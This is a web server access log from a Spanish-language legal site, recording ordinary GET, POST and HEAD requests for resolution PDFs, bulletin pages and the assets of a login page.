172.22.2.4 - - [20/Dec/2023:05:57:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
201.245.192.253 - - [20/Dec/2023:06:01:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:06:01:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
47.128.39.133 - - [20/Dec/2023:06:02:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%20701%20AL%20800%2F&order=asc&sort=date HTTP/1.1" 200 26639
47.128.39.133 - - [20/Dec/2023:06:02:47 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.39.133 - - [20/Dec/2023:06:02:47 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
201.245.192.253 - - [20/Dec/2023:06:03:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:06:03:37 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:06:03:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/2772.pdf HTTP/1.1" 200 776776
172.22.2.4 - - [20/Dec/2023:06:02:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:06:04:30 -0500] "GET /BLA/resoluciones/AUTOS%202023/3118.pdf HTTP/1.1" 200 2702815
172.22.2.4 - - [20/Dec/2023:06:03:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
201.245.192.253 - - [20/Dec/2023:06:05:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.204 - - [20/Dec/2023:06:05:09 -0500] "GET /BLA/resoluciones/AUTOS%202023/4399.pdf HTTP/1.1" 200 539862
216.244.66.195 - - [20/Dec/2023:06:05:11 -0500] "GET /BLA/resoluciones/AUTOS%202023/3210.pdf HTTP/1.1" 200 352913
216.244.66.195 - - [20/Dec/2023:06:05:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/3211.pdf HTTP/1.1" 200 355368
172.22.2.4 - - [20/Dec/2023:06:05:57 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 601047
216.244.66.195 - - [20/Dec/2023:06:06:30 -0500] "GET /BLA/resoluciones/AUTOS%202023/3307.pdf HTTP/1.1" 200 588443
201.245.192.253 - - [20/Dec/2023:06:06:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:06:06:57 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
201.245.192.253 - - [20/Dec/2023:06:07:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:06:07:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/3499.pdf HTTP/1.1" 200 757620
216.244.66.195 - - [20/Dec/2023:06:07:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2614.pdf HTTP/1.1" 200 312180
216.244.66.195 - - [20/Dec/2023:06:08:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2878.pdf HTTP/1.1" 200 707850
216.245.221.92 - - [20/Dec/2023:06:08:37 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:06:08:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3506.pdf HTTP/1.1" 200 301537
201.245.192.253 - - [20/Dec/2023:06:09:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:06:09:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0555.pdf HTTP/1.1" 200 230899
172.22.2.4 - - [20/Dec/2023:06:08:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:06:10:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0557.pdf HTTP/1.1" 200 231350
216.244.66.195 - - [20/Dec/2023:06:10:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2216.pdf HTTP/1.1" 200 466397
172.22.2.4 - - [20/Dec/2023:06:09:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
201.245.192.253 - - [20/Dec/2023:06:11:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
190.27.185.40 - - [20/Dec/2023:06:11:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
